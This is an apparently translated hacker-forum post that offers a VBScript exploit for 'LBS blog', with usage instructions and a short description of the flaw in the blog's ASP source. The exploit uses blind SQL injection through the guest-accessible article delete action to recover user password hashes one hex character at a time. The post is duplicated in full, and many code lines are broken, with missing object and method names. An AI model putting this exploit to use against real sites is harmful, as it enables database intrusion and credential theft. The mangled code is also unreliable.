Haha, it's just a proven loophole
exp is as follows, save as vbs, and then go to the program and test yourself
'From Sword Heart
'============================================================================
'Instructions for use:
' In the command prompt:
' The blog path of the website to be attacked Valid article id The blog user password to be cracked
'like:
' /blog/ 1 1
' by loveshell
'============================================================================
On Error Resume Next
Dim oArgs
Dim olbsXML 'XMLHTTP object is used to open the target URL
Dim TargetURL 'Destination URL
Dim userid,articleid 'blog username
Dim TempStr 'Storing the obtained part of MD5 password
Dim CharHex'Defines hexadecimal characters
Dim charset
Set oArgs =
If < 1 Then Call ShowUsage()
Set olbsXML = createObject("")
'Supplement full target website
TargetURL = oArgs(0)
If LCase(Left(TargetURL,7)) <> "http://" Then TargetURL = "http://" & TargetURL
If right(TargetURL,1) <> "/" Then TargetURL = TargetURL & "/"
TargetURL=TargetURL & ""
articleid=oArgs(1)
userid=oArgs(2)
TempStr=""
CharHex=Split("0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f",",")
"LBS blog All version Exploit"&vbcrlf
"By Jianxin"&vbcrlf
"/ Just For fun :)"&vbcrlf&vbcrlf
"+Fuck the site now"&vbcrlf
Call main(TargetURL,BlogName)
Set oBokeXML = Nothing
'----------------------------------------------sub-------------------------------------------------------
'============================================
'Function name: main
'Function function: main program, inject to obtain blog user password
'============================================
Sub main(TargetURL,BlogName)
Dim MainOffset,SubOffset,TempLen,OpenURL,GetPage
For MainOffset = 1 To 40
For SubOffset = 0 To 15
TempLen = 0
postdata = ""
postdata = articleid &" and (select left(user_password,"&MainOffset&") from blog_user where user_)='" & TempStr&CharHex(SubOffset) &"'"
OpenURL = TargetURL
"Post",OpenURL, False, "", ""
"Content-Type","application/x-www-form-urlencoded"
"act=delete&deleted")<>0 Then
'"The blog user does not exist or the information filled in is incorrect" is an error sign. Return to this sign description. The guessed MD5 is incorrect
'If you get the MD5 value of 0000000000000000, please modify the error flag
ElseIf InStr(GetPage,"permission")<>0 Then
TempStr=TempStr & CharHex(SubOffset)
"+Crack now:"&TempStr
Exit for
Else
vbcrlf & "Something error" & vbcrlf
vbcrlf & GetPage& vbcrlf
End If
next
Next
vbcrlf& "+We Got It:" & TempStr & vbcrlf &vbcrlf&":P Don't Be evil"
End sub
'============================================
'Function name: BytesToBstr
'Function function: convert content in XMLHTTP object into GB2312 encoding
'============================================
Function BytesToBstr(body)
dim objstream
set objstream = createObject("")
= 1
=3
body
= 0
= 2
= "GB2312"
BytesToBstr =
set objstream = nothing
End Function
'============================
'Function name: ShowUsage
'Function function: usage prompts
'============================
Sub ShowUsage()
"LBS blog Exploit" & vbcrlf & " By Loveshell/Sword Heart"
"Usage:"& vbcrlf & " CScript " & &" TargetURL BlogName"
"Example:"& vbcrlf & " CScript " & &" / 1 1"
""
End Sub
Vulnerability Description:
in src_article.asp
......
input["log_id"]=(input["log_id"]);
if(!input["id"]){
strError=lang["invalid_parameter"];
}else{
// Check if the article exists
("log_id, log_authorID, log_catID","log_id"]);
strError=false;
}
......
The filter is log_id, but the id is indeed used, haha :)
Then what?
Code in class/
= function(strselect, strwhere){
var tmpA=("select TOP 1 "+strselect+" FROM [blog_Article] where "+strwhere);
if(tmpA){
(tmpA[0]);
return true;
}else{
return false;
}
}
Needless to say, haha. But the trigger conditions can be met if they can meet them!
function articledelete(){
if(["delete"]<1){
// Check User Right - without DB Query
pageHeader(lang["error"]);
redirectMessage(lang["error"], lang["no_rights"], lang["goback"], "javascript:();", false, "errorbox");
}else{
var theArticle=new lbsArticle();
var strError;
By default, the guest has delete permission. Although the later judgment was made, the injection has already occurred, and we just used his judgment to inject it, haha
exp is as follows, save as vbs, and then go to the program and test yourself
'From Sword Heart
'============================================================================
'Instructions for use:
' In the command prompt:
' The blog path of the website to be attacked Valid article id The blog user password to be cracked
'like:
' /blog/ 1 1
' by loveshell
'============================================================================
On Error Resume Next
Dim oArgs
Dim olbsXML 'XMLHTTP object is used to open the target URL
Dim TargetURL 'Destination URL
Dim userid,articleid 'blog username
Dim TempStr 'Storing the obtained part of MD5 password
Dim CharHex'Defines hexadecimal characters
Dim charset
Set oArgs =
If < 1 Then Call ShowUsage()
Set olbsXML = createObject("")
'Supplement full target website
TargetURL = oArgs(0)
If LCase(Left(TargetURL,7)) <> "http://" Then TargetURL = "http://" & TargetURL
If right(TargetURL,1) <> "/" Then TargetURL = TargetURL & "/"
TargetURL=TargetURL & ""
articleid=oArgs(1)
userid=oArgs(2)
TempStr=""
CharHex=Split("0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f",",")
"LBS blog All version Exploit"&vbcrlf
"By Jianxin"&vbcrlf
"/ Just For fun :)"&vbcrlf&vbcrlf
"+Fuck the site now"&vbcrlf
Call main(TargetURL,BlogName)
Set oBokeXML = Nothing
'----------------------------------------------sub-------------------------------------------------------
'============================================
'Function name: main
'Function function: main program, inject to obtain blog user password
'============================================
Sub main(TargetURL,BlogName)
Dim MainOffset,SubOffset,TempLen,OpenURL,GetPage
For MainOffset = 1 To 40
For SubOffset = 0 To 15
TempLen = 0
postdata = ""
postdata = articleid &" and (select left(user_password,"&MainOffset&") from blog_user where user_)='" & TempStr&CharHex(SubOffset) &"'"
OpenURL = TargetURL
"Post",OpenURL, False, "", ""
"Content-Type","application/x-www-form-urlencoded"
"act=delete&deleted")<>0 Then
'"The blog user does not exist or the information filled in is incorrect" is an error sign. Return to this sign description. The guessed MD5 is incorrect
'If you get the MD5 value of 0000000000000000, please modify the error flag
ElseIf InStr(GetPage,"permission")<>0 Then
TempStr=TempStr & CharHex(SubOffset)
"+Crack now:"&TempStr
Exit for
Else
vbcrlf & "Something error" & vbcrlf
vbcrlf & GetPage& vbcrlf
End If
next
Next
vbcrlf& "+We Got It:" & TempStr & vbcrlf &vbcrlf&":P Don't Be evil"
End sub
'============================================
'Function name: BytesToBstr
'Function function: convert content in XMLHTTP object into GB2312 encoding
'============================================
Function BytesToBstr(body)
dim objstream
set objstream = createObject("")
= 1
=3
body
= 0
= 2
= "GB2312"
BytesToBstr =
set objstream = nothing
End Function
'============================
'Function name: ShowUsage
'Function function: usage prompts
'============================
Sub ShowUsage()
"LBS blog Exploit" & vbcrlf & " By Loveshell/Sword Heart"
"Usage:"& vbcrlf & " CScript " & &" TargetURL BlogName"
"Example:"& vbcrlf & " CScript " & &" / 1 1"
""
End Sub
Vulnerability Description:
in src_article.asp
......
input["log_id"]=(input["log_id"]);
if(!input["id"]){
strError=lang["invalid_parameter"];
}else{
// Check if the article exists
("log_id, log_authorID, log_catID","log_id"]);
strError=false;
}
......
The filter is log_id, but the id is indeed used, haha :)
Then what?
Code in class/
= function(strselect, strwhere){
var tmpA=("select TOP 1 "+strselect+" FROM [blog_Article] where "+strwhere);
if(tmpA){
(tmpA[0]);
return true;
}else{
return false;
}
}
Needless to say, haha. But the trigger conditions can be met if they can meet them!
function articledelete(){
if(["delete"]<1){
// Check User Right - without DB Query
pageHeader(lang["error"]);
redirectMessage(lang["error"], lang["no_rights"], lang["goback"], "javascript:();", false, "errorbox");
}else{
var theArticle=new lbsArticle();
var strError;
By default, the guest has delete permission. Although the later judgment was made, the injection has already occurred, and we just used his judgment to inject it, haha